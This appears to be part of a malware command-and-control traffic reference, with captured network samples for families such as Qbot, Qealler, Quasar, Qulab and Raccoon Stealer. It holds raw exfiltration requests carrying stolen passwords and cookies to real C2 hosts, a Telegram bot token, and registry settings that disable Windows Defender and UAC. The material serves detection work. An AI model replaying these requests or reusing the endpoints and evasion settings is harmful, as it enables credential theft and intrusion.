Pragma: no-cache Content-Length: 132 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: text/plain; charset=utf-8 nr8uEQylGUpuY0Qjyde/Fn3TGzRg6JFXvSXGhXxBL0Ls2eMYLaWSpJIvp6bRuCqmkclDgfyfYtc7/hQGxqKlJiPdCQ0v/JyN12lNiho7IjBLW3VB02orxGMXTr04WaAQz73qPOST /api/gate.get?p1=2&p2=5&p3=0&p4=2&p5=0&p6=0&p7=0&p8=0&p9=0&p10=udh8T1P6VQh1ZF9DgIniQjWRSWBTqqYq5k2u HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.906.121 Safari/537.36 Host: 95.215.205.56 Content-Length: 6028 Connection: Keep-Alive Cache-Control: no-cache Cookie: SID_INTERFICE=4c616d7fffe95fe8fc2f4f46d272c8a0412c1404 -----------------------------228 Content-Disposition: form-data; name="file"; filename="s7q3q0u1v7q3q0u1v7.zip" Content-Type: application/octet-stream PK..........IO................Outlook/UT ...K.].K.].K.]PK..........IOo...?...F.......Outlook/Outlook.txtUT ...K.].K.].K.]s.M...R...K.t(./.K..e.. H,.../J.......f@.`...+.CK#=C3.=C=C../..PK..........IO................General/UT ...K.].K.].K.]PK..........IO................Cookies/UT ...K.].K.].K.]PK..........IO................History/UT ...K.].K.].K.]PK..........IO................Other/UT ...K.].K.].K.]PK..........IOa.qZ............History/Chrome_0.txtUT ...K.].K.].K.].V[k.8.~..?.............B...>..,{D4.V....?..e..4M.M...`....s...O....3..b%....0. 7.'_.;s6.H}6.kZ.Fz........i...aZ...".".v.P.x>PR.[.D...$Q..."...% f...Y.[.V.......G.*"...Ig..Y...k=}..}..U....@....T..n.-)7Z.Yt..%...$.P.vQ....p.z..&..t...P[...w...T....6A..!k...:...V...Fp.....-.a.....7......_.X...E../;..T8..7.I..)Y..(..,....)JP..........nf..g..E.\..(..@..XQ.l....".e..a.X .H.?*.".a.F9`..~zrzr.. .M...... . ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/predator.png "Predator") #### Proyecto (aka Nemours) RAT ~~~ 0|New - 25-10-19/21:41|United States|USER-PC - admin|Windows 7 Professional - 32 Bits / Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz / 4 / / 0|US|0|192.168.100.60|0 Cap.|oolkth|9090|OFF| - 0 / || Tiene Capturas de: |New - |||No Available 13|Program Manager|OFF|OFF - 0 / || ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/proyecto.png "Proyecto") #### Pyrogenic flah on "53 E1 6D D3 9E EE 45 D4" on iniial connection, 175 bytes ~~~ 00000000 53 S 00000001 e1 6d d3 9e ee 45 d4 ad 26 96 67 86 36 fb f7 cc .m...E.. &.g.6... 00000011 3f 15 13 b7 cf 5e 99 ac dc 9d e6 36 cd 61 bd 91 ?....^.. ...6.a.. 00000021 37 5c db a0 15 ec f4 5a 9a 63 96 7f 2b e6 b3 3c 7\.....Z .c..+..< 00000031 96 a9 aa fe d6 37 6d f5 1d 57 8f 26 f1 03 a4 7a .....7m. .W.&...z 00000041 7b d9 5f 01 8c 5e 87 c5 de 80 a2 52 15 24 e0 73 {._..^.. ...R.$.s 00000051 51 70 b4 6f 60 7c a8 4c df 36 ac df 96 b3 18 b5 Qp.o`|.L .6...... 00000061 54 37 74 9b d1 60 06 f1 46 b2 8f e2 23 f2 58 80 T7t..`.. F...#.X. 00000071 de d9 8d d9 10 35 91 7f d9 74 4b 6e 05 4c 13 9f .....5.. .tKn.L.. 00000081 68 85 65 d0 bb f6 67 0c 78 ae 12 b6 ab 89 90 14 h.e...g. x....... 00000091 e0 47 c5 56 c9 e0 0f 17 73 95 ee 30 08 fa 0e 47 .G.V.... s..0...G 000000A1 cd ec dd 72 db e7 ff bf b9 57 b3 61 c4 cb 4c ...r.... .W.a..L ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/pyrogenic.png "Pyrogenic") #### Qbot usually url is /t3 ~~~ POST /t3 HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 174.48.72.160 Content-Length: 215 Cache-Control: no-cache ycgizbarun=8e5ygoO+WS2h/ypd2ZEi8nHeEKPFyrdKrXgLyQd6Gi76j4KxXuMEm2K/lEHrTJqqWdDWXZQWcLyTbSnECgNFerjMjb9ittXV+rg/yqpLMLtOWYw6pCz2nDkPbGnUW3Z61/yZoSoh9zdJzkpTmYMCloxmblZ9Eos4QZHsiMecjlcmNjwU1D/9ShQ6cGKSJxHNVT2lNGCykNU= HTTP/1.1 200 OK Server: nginx/1.9.12 Content-Length: 41 ParseHttpResponse() failed pCurlResp=NULL ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/qbot.png "Qbot Qakbot") #### Qealler RAT ~~~ ........t.]{"serverPath":"C:\\Users\\Jonathan\\Desktop\\PO6671.jar","securityRetry":20,"vbox":false,"serverVersion":"v2.0.0","mainPath":"C:\\Users\\Jonathan\\QkpCj","nickName":"14TH TWETWE APRIL","vmware":false,"encryptKey":"NnKHsguoUsbJwLwumvSXFoiWR","operatingSystem":{"osDefaultArch":"amd64","country":{"code":"us","name":"United States"},"icon":"windows7","admin":true,"language":"English (United States)","type":1,"processor":2,"osDefaultName":"Windows 7","computerUser":"Jonathan","javaArchitecture":"amd64","computerName":"JONATHAN-PC","name":"Windows 7 Professional","osDefaultVersion":"6.1","jreVersion":"1.8.0","architecture":"amd64","ram":"3 GB"},"uuid":"7094850e-92de-4eed-b492-65d966bc00b5lumteifxDUDU","command":1,"network":[{"delay":2,"port":4424,"dns":"marketingsiamgrains.zapto.org"}],"jrePath":"C:\\Users\\Jonathan\\Oracle\\bin\\javaw.exe","userTitle":"Jonathan@JONATHAN-PC","security":[{"process":["UserAccountControlSettings.exe"],"code":"user-account-control","reg":[{"value":"\"ConsentPromptBehaviorAdmin\"=dword:00000000\r\n\"ConsentPromptBehaviorUser\"=dword:00000000\r\n\"EnableLUA\"=dword:00000000\r\n\"PromptOnSecureDesktop\"=dword:00000000\r\n","key":"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","valuesCommand":[]}],"name":{"en":"User Account Control"}},{"process":["Taskmgr.exe"],"code":"task-manager","reg":[{"value":"\"DisableTaskMgr\"=dword:00000002\r\n","key":"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","valuesCommand":[{"name":"DisableTaskMgr","valueCommand":"2","valueCommandType":"REG_DWORD","key":"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"}]}],"name":{"en":"Task Manager"}},{"process":["procexp.exe"],"code":"msconfig","name":{"en":"MsConfig"}},{"process":["MSASCuiL.exe","MSASCui.exe","MsMpEng.exe","MpUXSrv.exe","MpCmdRun.exe","NisSrv.exe","ConfigSecurityPolicy.exe"],"code":"windows-defender","reg":[{"value":"\"DisableAntiSpyware\"=dword:00000001\r\n","key":"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender","valuesCommand":[{"name":"DisableAntiSpyware","valueCommand":"1","valueCommandType":"REG_DWORD","key":"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender"}]},{"value":"\"DisableBehaviorMonitoring\"=dword:00000001\r\n\"DisableOnAccessProtection\"=dword:00000001\r\n\"DisableScanOnRealtimeEnable\"=dword:00000001\r\n","key":"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection","valuesCommand":[{"name":"DisableBehaviorMonitoring","valueCommand":"1","valueCommandType":"REG_DWORD","key":"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"},{"name":"DisableOnAccessProtection","valueCommand":"1","valueCommandType":"REG_DWORD","key":"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"},{"name":"DisableScanOnRealtimeEnable","valueCommand":"1","valueCommandType":"REG_DWORD","key":"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"}]}],"name":{"en":"Windows Defender"}}],"installDate":{"daysRunning":0,"lastModified":1586920462000},"installation":{"jarName":"vrpiI","moduleFolder":"fZrJY","moduleEntry":"LmqeMOCMZKDnCAMInhONhNssACvKupnYNmRGqciHQTmDqMeajNLIKvjeiGOkSFQDkiMQfSaBSp/atbrMtgqBWJtmbTArraiRtMHwMQqwICMrbnBkjtHHUsULWJhUZZJAlRSSnSZvWFv/hidBDxdVcfNQOjMqVwjrrjqXirgxqjnS.BlDbZGWeXeYlqIdKpxKaROeDvagYjATCOaTNXXRK","uniqueIDFile":".ntusernt.ini","delay":2,"jreFolder":"Oracle","active":true,"mainFolder":"QkpCj","moduleExtension":"Jus.txt","jarExtension":"class.txt","jarRegistry":"eHgASPs"},"localIp":"192.168.100.101"}t..{"command":104}t..{"command":114}t..{"command":115}t.N{"title":"\r\n[Administrator: Command Prompt - dump 2888]\r\n","command":115}t.H{"time":{"hour":0,"minute":0,"second":0},"command":114,"sleeping":false}t.A{"title":"\r\n[Administrator: Command Prompt]\r\n","command":115}t.,{"title":"\r\n[TCPHound]\r\n","command":115}t. {"moduleId":"008","command":108}t.X{"title":"\r\n[MegaDumper 1.0 by CodeCracker / SnD (Not Responding)]\r\n","command":115}t.G{"title":"\r\n[MegaDumper 1.0 by CodeCracker / SnD]\r\n","command":115}t. {"moduleId":"008","command":108}t.H{"time":{"hour":0,"minute":0,"second":0},"command":114,"sleeping":false}t.,{"title":"\r\n[TCPHound]\r\n","command":115}t.N{"title":"\r\n[Administrator: Command Prompt - dump 2888]\r\n","command":115}t..{"command":111} ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/qealler.png "Qealler") #### Quasar RAT Flag on "40 00 00 00" pattern, 68 data bytes on first packet ~~~ 00000000 40 00 00 00 3e 83 58 08 ad d1 05 8d 77 20 53 1f @...>.X. ....w S. 00000010 dc 2e e8 99 0a f3 f1 bb 3a 8c c2 a1 9d 72 4a 69 ........ :....rJi 00000020 e6 60 97 da 1e 76 87 16 91 f2 1b c4 f4 89 f9 8a .`...v.. ........ 00000030 20 5b 19 e5 7c ae ed f1 b4 5a d2 ce 5f 86 17 20 [..|... .Z.._.. 00000040 c6 b3 03 8c .... ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/quasar.png "Quasar") #### Qudox ~~~ GET /gate.php?check HTTP/1.1 Host: 195.2.92.64 HTTP/1.1 200 OK Date: Fri, 04 Sep 2020 13:08:34 GMT Server: Apache/2.4.25 (Debian) Content-Length: 12 Content-Type: text/html; charset=UTF-8 by+B+dC9UQ== GET /gate.php HTTP/1.1 Host: 195.2.92.64 Content-Length: 76 TBOs3enZOi2/1kVNZdn9bAt1EnPmqL4g9GBGU95XoNzQo6hiYel7j0rkpapVu45CkORs54FJtg== ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/qudox.png "Qudox") #### Qulab Clipper ~~~ GET /bot873737212:AAFatKVhb76Tb7yoLv3dCtDO9sgKAsUV_gg/getMe HTTP/1.1 User-Agent: AutoIt Host: api.telegram.org Cache-Control: no-cache HTTP/1.1 200 OK Server: nginx/1.16.1 Date: Fri, 01 Nov 2019 18:11:04 GMT Content-Type: application/json Content-Length: 124 Connection: keep-alive Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"id":873737212,"is_bot":true,"first_name":"MASADCLIPPERANDSTEALER","username":"aliclipperstealer_bot"}} ~~~ ~~~ POST /bot873737212:AAFatKVhb76Tb7yoLv3dCtDO9sgKAsUV_gg/sendDocument HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=----WinHttpBoundaryLine_56206.90110 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,*/*;q=0.5 Accept-Charset: utf-8;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 6.1) WinHttp/1.6.4.0 (WinHTTP/5.1) like Gecko Content-Length: 55058 Host: api.telegram.org ------WinHttpBoundaryLine_56206.90110 Content-Disposition: form-data; name="chat_id" 880414267 ------WinHttpBoundaryLine_56206.90110 Content-Disposition: form-data; name="document"; filename="ENU_6887FE9730D2535E9D41.7z" Content-Type: application/octet-stream 7z..'...E..P........$.......aO...5...]....C.k".0DL.p1SC ...UM..,.j .M.%...}...)..p.d...7.+..w..,..\....w.0z9:6....6...94..._...r..Xu.,........ .<&:e...S.4.....k._4jn. .....)+/q.*?..2 ..j..tj.Y....M.o...$1...H.....r..*%.J.A......Y..2.......0..+.......uz..../O......48.7........&.A...WT{...v.W.\.o.....cax..H.Y...A....<4<.8|........p0E....f..W.X.....Z.. ...k5..0 .1t..r.1L.p.Y,.3.....H.f......0.$....JGv...z..L'....'...&<.&m....@rS...r......u...6.#.7z...h.B..._.S.....z..F..q...].V3`w1/...._f(m...$....W<....L&Zv.a......HR.'.r...H'J(.f.......&_?..8.EL...#...j..(....._.\Vw ....d%{.$MR`e!.]..$ ...-.ct...~Za@YsbNNG...~.R......b..'..oRW3.L..N..&.Q4. ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/qulab.png "Qulab") #### RaaLoader aka Pefsire ~~~ 00000000 12 10 00 00 00 00 00 00 00 00 00 00 ........ .... 00000000 00 00 00 00 06 ..... 0000000C 00 00 00 00 06 ..... 00000005 00 00 00 00 06 ..... 00000011 00 00 00 00 06 ..... ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/raaloader.png "RaaLoader") #### Raccoon Stealer ~~~ POST /gate/log.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 155 Host: 35.189.105.242 params=Ym90X2lkPTkwMDU5QzM3LTEzMjAtNDFBNC1CNThELTJCNzVBOTg1MEQyRl9hZG1pbiZjb25maWdfaWQ9NGVkZTQxZmUwZWE5NjMwMzRhM2Q2NWYwZGQ0NDJkZTQ2NzFjMjE0ZiZkYXRhPW51bGw=HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Mon, 30 Sep 2019 19:36:57 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin: * {"url":"http://35.189.105.242/file_handler/file.php?hash=559f10a49e5f74c12b67d2b61c0dea701f752e43&js=cbe0dbfb63ca8503c1938fc9cdd5f5f3818d81b9&callback=http://35.189.105.242/gate","attachment_url":"http://35.189.105.242/gate/sqlite3.dll","libraries":"http://35.189.105.242/gate/libs.zip","ip":"89.187.165.57","config":{"masks":null,"loader_urls":["https://mygift.space/download/beam.exe"]},"is_screen_enabled":0,"is_history_enabled":0}HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Mon, 30 Sep 2019 19:36:57 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin: * {"url":"http://35.189.105.242/file_handler/file.php?hash=559f10a49e5f74c12b67d2b61c0dea701f752e43&js=cbe0dbfb63ca8503c1938fc9cdd5f5f3818d81b9&callback=http://35.189.105.242/gate","attachment_url":"http://35.189.105.242/gate/sqlite3.dll","libraries":"http://35.189.105.242/gate/libs.zip","ip":"89.187.165.57","config":{"masks":null,"loader_urls":["https://mygift.space/download/beam.exe"]},"is_screen_enabled":0,"is_history_enabled":0}POST /file_handler/file.php?hash=559f10a49e5f74c12b67d2b61c0dea701f752e43&js=cbe0dbfb63ca8503c1938fc9cdd5f5f3818d81b9&callback=http://35.189.105.242/gate HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data, boundary=Jfbvjwj3489078yuyetu Content-Length: 2152 Host: 35.189.105.242 ._= --Jfbvjwj3489078yuyetu content-disposition: form-data; name="file"; filename="data.zip" Content-Type: application/octet-stream PK..........>O..5kf....... ...passwords.txtUT ..`Y.]ZY.]ZY.]..w..Rp..O.IUp.(..M...... f....[.....%&.&..g.%....r........R+. .K@..\....P....bcS3^.^.`..n.E.n..0.I2..PK..........>O"..:............browsers/firefox_cookie.txtUT ..`Y.]`Y.]`Y.]..KK.@...S.O.8..+.. .+..kJ6a..!. mb...T.qQ...... .@...:.,m..y.... a...RK. .......]w.\.U.k...L<..........s.m...|..9=.].l..0...7W...zY..mi....e...........di"..|M.t2...T..E...6.RI...dB.-s..c<.c.......;.r..E....tr.[.. ......g@..X....^.Dl.`W.?.YQ.o...F...$\..K..v..+..." 0.|.PK..........>O................browsers/firefox_urls.txtUT ..`Y.]`Y.]`Y.]..K..0...= w....>hI....4..(h.lI[.zz....v7.........s.......}.MS...@kd_.n........Vw.e. ........H1%.@.8._..A.+\.U._.O.....,C1..q..tj.......'......`..c_.+.Z.N...(2,....|.. 8.vd.f.p.1.,y..PK..........>O.JJ.:...Z.......browsers/chrome_autofill.txtUT ..ZY.]ZY.]ZY.]s./.U.K.M.Rp.,*...2y..@.e.9.@a.......^..0D.O"6.A.)E.... ..PK..........>O..GMN...|.......mails/outlook.txtUT ..eY.]eY.]eY.].. P.N-*K-.2.4.34..3.3.. ..0.*.....c....Z.P._.....U.Z.T.M" ...<.(."Y......r..PK..........>O..DH....o.......System Info.txtUT ..eY.]eY.]eY.]mR]k.0.}^ ..>&.6.l..`0'Y..f.$...(.....d$;k..'ws)ez.:..su?~.D][k.....~A.W.3...F....Qx..d.+-...Vi..bn...?.K....V...;...K ^..x..P.1-....8.G..2...pE..<........Y.........?..".~.5....c.F|........0..u8;....h..2.. X....g..a"..|.>T;.IV$.[.,[...{...c.. . ...f.e.y...%k.[-.@.U..C7?.yX.a.p..o*.8.6..PI.v..7.......Tm.y..?PK............>O..5kf....... . ....... .......passwords.txtUT...`Y.]PK............>O"..:.......... ....... .......browsers/firefox_cookie.txtUT...`Y.]PK............>O.............. ....... .......browsers/firefox_urls.txtUT...`Y.]PK............>O.JJ.:...Z..... ....... .......browsers/chrome_autofill.txtUT...ZY.]PK............>O..GMN...|..... ....... ...~...mails/outlook.txtUT...eY.]PK............>O..DH....o..... ....... .......System Info.txtUT...eY.]PK.................... --Jfbvjwj3489078yuyetu--HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Mon, 30 Sep 2019 19:37:10 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin: * true"success" ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/raccoon-1.png "Predator") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/raccoon-2.png "Predator") #### Ramnit ~~~ GET / HTTP/1.1 Host: www.yx-lj.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 HTTP/1.1 200 OK Content-Length: 114482 Content-Type: text/html Content-Location: http://www.yx-lj.com/index.htm Last-Modified: Tue, 21 May 2019 01:43:35 GMT Accept-Ranges: bytes ETag: "47c7bf9a76fd51:ac9" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Date: Thu, 17 Oct 2019 18:56:31 GMT .......... ..........